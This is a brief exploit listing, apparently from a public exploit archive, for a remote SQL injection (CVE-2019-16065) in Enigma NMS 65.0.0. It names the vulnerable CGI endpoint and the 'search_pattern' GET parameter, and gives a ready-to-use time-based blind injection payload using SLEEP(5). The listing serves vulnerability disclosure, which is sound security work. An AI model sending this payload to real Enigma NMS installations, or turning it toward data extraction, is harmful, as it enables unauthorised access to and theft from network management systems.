Enigma NMS 65.0.0 SQL Injection

Enigma NMS version 65.0.0 suffers from a remote SQL injection vulnerability.

MD5 | e342a98c9659608a938a2f109885a261

# Exploit Title: Enigma NMS search_pattern SQL Injection #
# Date: 21 July 2019 #
# Author: Mark Cross (@xerubus | mogozobo.com) #
# Vendor: NETSAS Pty Ltd #
# Vendor Homepage: https://www.netsas.com.au/ #
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/ #
# Version: Enigma NMS 65.0.0 #
# CVE-IDs: CVE-2019-16065 #
# Full write-up: https://www.mogozobo.com/?p=3647 #
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| D_ ]\ \/ -= Enigma SQLi by @xerubus =-
| D _]/\ \ -= We all have something to hide =-
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Request: http://<enigma_nms_ipaddr>/cgi-bin/protected/manage_hosts_short.cgi?action=search_proceed&search_pattern=
Vulnerable Parameter: search_pattern (GET)
Payload: action=search_proceed&search_pattern=a%' AND SLEEP(5) AND '%'='

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